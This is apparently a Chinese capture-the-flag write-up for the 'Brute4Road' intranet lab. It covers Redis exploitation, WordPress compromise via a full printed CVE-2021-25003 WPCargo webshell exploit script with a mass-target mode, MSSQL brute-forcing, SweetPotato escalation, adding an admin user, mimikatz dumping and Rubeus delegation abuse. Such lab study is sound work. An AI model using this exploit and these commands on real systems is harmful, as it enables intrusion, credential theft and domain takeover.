春秋云境 Brute4Road

Brute4Road是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag，分布于不同的靶机。

前置知识:

内网渗透学习(代理篇)
linux提权笔记
windows提权笔记
内网渗透学习(Kerberos篇)

---

入口（172.22.2.7）

依旧fscan

6379有未授权，尝试打redis主从复制
反弹shell

redis权限，suid提权，可以用base64

flag01

[redis@centos-web01 db]$ base64 "/home/redis/flag/flag01" | base64 --decode
base64 "/home/redis/flag/flag01" | base64 --decode
 ██████                    ██              ██  ███████                           ██
░█░░░░██                  ░██             █░█ ░██░░░░██                         ░██
░█   ░██  ██████ ██   ██ ██████  █████   █ ░█ ░██   ░██   ██████   ██████       ░██
░██████  ░░██░░█░██  ░██░░░██░  ██░░░██ ██████░███████   ██░░░░██ ░░░░░░██   ██████
░█░░░░ ██ ░██ ░ ░██  ░██  ░██  ░███████░░░░░█ ░██░░░██  ░██   ░██  ███████  ██░░░██
░█    ░██ ░██   ░██  ░██  ░██  ░██░░░░     ░█ ░██  ░░██ ░██   ░██ ██░░░░██ ░██  ░██
░███████ ░███   ░░██████  ░░██ ░░██████    ░█ ░██   ░░██░░██████ ░░████████░░██████
░░░░░░░  ░░░     ░░░░░░    ░░   ░░░░░░     ░  ░░     ░░  ░░░░░░   ░░░░░░░░  ░░░░░░ 


flag01: flag{68ba4a2f-9561-46b9-8b03-d87a22290213}

Congratulations! ! !
Guess where is the second flag?

内网

使用 netstat -ano 获取所在网段

上传fscan扫c段

nohup fscan -h 172.22.2.7/24 > 1.txt &


[redis@centos-web01 db]$ cat 1.txt
cat 1.txt

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.2.18     is alive
(icmp) Target 172.22.2.16     is alive
(icmp) Target 172.22.2.3      is alive
(icmp) Target 172.22.2.7      is alive
(icmp) Target 172.22.2.34     is alive
[*] Icmp alive hosts len is: 5
172.22.2.3:445 open
172.22.2.16:445 open
172.22.2.18:445 open
172.22.2.3:139 open
172.22.2.16:139 open
172.22.2.34:135 open
172.22.2.34:139 open
172.22.2.18:139 open
172.22.2.3:135 open
172.22.2.16:135 open
172.22.2.16:80 open
172.22.2.18:22 open
172.22.2.7:80 open
172.22.2.18:80 open
172.22.2.7:22 open
172.22.2.7:21 open
172.22.2.7:6379 open
172.22.2.16:1433 open
172.22.2.34:445 open
172.22.2.3:88 open
[*] alive ports len is: 20
start vulscan
[*] NetInfo 
[*]172.22.2.16
   [->]MSSQLSERVER
   [->]172.22.2.16
[*] NetInfo 
[*]172.22.2.3
   [->]DC
   [->]172.22.2.3
[*] WebTitle http://172.22.2.16        code:404 len:315    title:Not Found
[*] NetInfo 
[*]172.22.2.34
   [->]CLIENT01
   [->]172.22.2.34
[*] OsInfo 172.22.2.3   (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.2.34     XIAORANG\CLIENT01             
[*] OsInfo 172.22.2.16  (Windows Server 2016 Datacenter 14393)
[*] WebTitle http://172.22.2.7         code:200 len:4833   title:Welcome to CentOS
[*] NetBios 172.22.2.3      [+] DC:DC.xiaorang.lab               Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.2.16     MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.2.18     WORKGROUP\UBUNTU-WEB02        
[+] ftp 172.22.2.7:21:anonymous 
   [->]pub
[*] WebTitle http://172.22.2.18        code:200 len:57738  title:又一个WordPress站点
已完成 20/20
[*] 扫描结束,耗时: 12.660045085s

一共五台机器

172.22.2.7      入口redis
172.22.2.18     wordpress
172.22.2.3      域控
172.22.2.16     mssql
172.22.2.34

挂socks代理

nohup ./iox proxy -l 6666 &

WordPress（172.22.2.18）

wpscan扫一下WordPress站点

proxychains4 wpscan --url http://172.22.2.18/ --api-token xxx

WPCargo这个插件有nday

# @author : biulove0x
# @name   : WP Plugins WPCargo Exploiter

## This is a magic string that when treated as pixels and compressed using the png
## algorithm, will cause <?=$_GET[1]($_POST[2]);?> to be written to the png file
## payload = '2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50'
## def encode_character_code(c: int):
##     return '{:08b}'.format(c).replace('0', 'x')
## text = ''.join([encode_character_code(c) for c in binascii.unhexlify(payload)])[1:]

# References : https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a

from urllib3.exceptions import InsecureRequestWarning
import concurrent.futures
import requests, re, argparse

print(
'''
############################################
# @author : biulove0x                      #
# @name   : WP Plugins WPCargo Exploiter   #
# @cve    : CVE-2021-25003                 #
############################################
''')

def wpcargo(_target, _timeout=5):
    _payload  = 'x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx'
    _endpoint = 'wp-content/plugins/wpcargo/includes/barcode.php?text='+ _payload +'&sizefactor=.090909090909&size=1&filepath=../../../wp-conf.php'
    _sessionget = requests.Session()
    _headers = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'
    }
    def save_result(_result):
        _saved = open('RESULT-WPCRGO.txt', 'a+')
        _saved.write(_result + '\n')
    
    try:
        _sessionget.get(url=_target + _endpoint, headers=_headers, allow_redirects=True, timeout=_timeout)
        _validationshell = _sessionget.post(url=_target + 'wp-content/wp-conf.php?1=system', headers=_headers, allow_redirects=True, data={"2": "cat /etc/passwd"}, timeout=_timeout)
        
        if 'root:x:0:0:root' in _validationshell.text:
            print('[-] ' + _target + 'wp-content/wp-conf.php => Uploaded!')
            save_result(_target + 'wp-content/wp-conf.php?1=system')
        else:
            print('[+] ' + _target + ' Not found!')
    except:
        print('[%] ' + _target + ' Requests failed')

def main(_choose, _target):
    if _choose == 1:
        wpcargo(_target)

    elif _choose == 2:
        with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
            _ur_list = open(_target, 'r').read().split()
            _futures = []

            for _url in _ur_list:
                _futures.append(executor.submit(wpcargo, _target=_url))

            for _future in concurrent.futures.as_completed(_futures):
                if(_future.result() is not None):
                    print(_future.result())
    else:
        exit()
        
## SSL Bypass
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

## Setup args
_parser = argparse.ArgumentParser(description='CVE-2021-25003 [ WPCargo < 6.9.0 - Unauthenticated RCE ]')
_parser.add_argument('-t', metavar='example.com', type=str, help='Single target')
_parser.add_argument('-l', metavar='target.txt', type=str, help='Multiple target')
_args = _parser.parse_args()

## Variable args
_singleTarget = _args.t
_multiTarget  = _args.l

if __name__ == '__main__':
    if not _singleTarget == None:
        _choose = 1
        main(_choose, _singleTarget)
    elif not _multiTarget == None:
        _choose = 2
        main(_choose, _multiTarget)
    else:
        print('WpCargo.py --help for using tools')

蚁剑连接

在 /var/www/html/wp-config.php 查看数据库配置

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** Database username */
define( 'DB_USER', 'wpuser' );

/** Database password */
define( 'DB_PASSWORD', 'WpuserEha8Fgj9' );

/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

连上数据库后可以看到flag02

在 S0meth1ng_y0u_m1ght_1ntereSted 表里还有一个密码表

用数据库里的密码作为字典爆破.16的mssql

fscan.exe -h 172.22.2.16 -m mssql -pwdf pass.txt
[+] mssql 172.22.2.16:1433:sa ElGNkOiC

MsSql（172.22.2.16）

mdut连接，先激活 Ole Automation Procedures 组件，再上传 SweetPotato.exe 提权，得到 system 权限

flag03

C:/Users/Public/SweetPotato.exe -a "dir C:\Users\Administrator\flag\"
C:/Users/Public/SweetPotato.exe -a "type C:\Users\Administrator\flag\flag03.txt"

查看端口发现开放了3389，为了后续操作方便可以添加一个用户远程上去

C:/Users/Public/SweetPotato.exe -a "netstat -ano"
C:/Users/Public/SweetPotato.exe -a "net user dr0n1 Qwer1234 /add"
C:/Users/Public/SweetPotato.exe -a "net localgroup administrators dr0n1 /add"

DC（172.22.2.3）

systeminfo查看信息，在 xiaorang.lab 域中

bloodhound 或者 AdFind 分析发现 MSSQLSERVER 配置了到 DC LDAP 和 CIFS 服务的约束性委派

mimikatz 读取域用户哈希

mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit


Username : MSSQLSERVER$
Domain   : XIAORANG
NTLM     : 6cc34f4dd588e5adafca81c80b69b400

用 Rubeus 申请用户 MSSQLSERVER$ 的 TGT 票据

Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:6cc34f4dd588e5adafca81c80b69b400 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap > 1.txt

复制票据的base64编码

然后通过 Rubeus 的 S4U2Self 协议代表域管理员申请针对域控 CIFS 服务的票据并注入内存

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE1+MrNLJf8hRPsIS+pUx5K9ioqtOAGCjQQT1EtKEmTxLmCMkeggjLnQD9TMVCj03VM2dhUMu4TDuJPkzAjbU6NDwC9EbOy72906qkgch7Oiu+WW1t9kGzKyjtsKBJdeYBn6260lFHca8sVYUEE0/WfbIrst8HQgY1HuPg4vJcLM1jwFAjlSyY4VPTGDvYBuspDq4t8oDKU5xGfuvDb1iM5IC9kgG0pdTzVLj2OLl/nG40eMhDnpqPd40X25PRxJsVRfSqY1N0M7GGzkke7SipoMUTo6M7FFwFfO6Ixo+8XIkEzWS5bvSw/1vSNBv+gJorQcaShM4m+nphIRLhDxNIF7Dhg4WNKt/9T8qldof4GrQO6RZRMbwc1d1byHRfDZ7DEsZjpI8IODUQNz55/L1sVKkUZ79DrSpcmph9S5hbesucMYPBKwmNzdYvslzpSIifDh4bGyeByjPvzHxUrbTgYOd+A9pRrYFq7RYUC+lEiz4kLrpHjrQh1wQV6K0GtTqJwbPQ5G2TA3gN1iAnRBcLqwCYYEfAk0rOheYOcQeo7vXAVwC0EuTvzXtwgzbHbgcBxnJfdJMkkIFuEHLY7Ss6mKJCorVc6tgfuZN+9I7qh4uREJMpPNDSPvzMpQivWgZl+Za4sTEgHgg4h67R9wNxv1C8GmHyDdDnlMzbcz5aJXSJX43ZcR9lWlaV/HSz3eknqmGDmWqKRVEk6wX6v46DYgHzvH9Dmx2o3bx5QXEJk8kAh3zCcqwfbstUF4DbKEHBKE7dtYeFl8tpmxuZRvs5PmAWopr1Wc56p++5nBn1Ou3TW6OVUtSl9b+foUSmxSNogPYuoIOHzUGRa3kHWYJ+EXbFlmxK8BhqDP40qzoZsK82zxW/ylOtGH1oFG3mozq5zCecE+ShTbNK5tkhDt5u5QMdjrNd6f/xkzZlQ0sMERaLNmBd+FHwut816ny3dj2M2QjKGVkjom6i4nhhBQZ97Pmmf5b+E4C9yYdoWTrmujwYrJLrlK3N5VXnPr7r8bQzHTrC20uTF7zdNimiJcISMaKC8TKWzaJ5FCW03+z8uRA+itb2pv1Xjk1kk9QMDm2uHJUd9lUUhxv/waDL510I361SHOl2cxj+XgY6Zb29VnIwT4Z/sV+54EdN1HAmQpQE8H1bhIXOevnS5tbeWLwLrwNPtV9DO+Pwo/ZAdYQdqjEdNXryQdDjflubFVvy3Vhbt7knOJTtpabOrpBXN1y2i6sLmo0ukm2vT0JHL7lqa37fyfcJYCeqw7PBGIfMDVwjHFporzmbCBKUVuh0p9NBzMifdKNXWmS5R0orIM12K42ZaK5SC59AAVFhEXxNVu7yyhHQIVwoR7IOBlRpFfPJvc60e9hyCrxxjyAMjNp2zHFhdosGWf6yWywxAkMlFvQkjXIfWGSWpUCKUguMLG+jMRc4ShgPAgnr0+DsCxU8fXrmwbcMnQcgYrWay7ksijgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBDs2Z1w7FALNmP9KIeq+tISoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI1MTAyOTEzNTg0M1qmERgPMjAyNTEwMjkyMzU4NDNapxEYDzIwMjUxMTA1MTM1ODQzWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

查看域控的flag04

type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt

或者利用 LDAP 服务，然后通过DCSync拿到管理员的hash 然后pth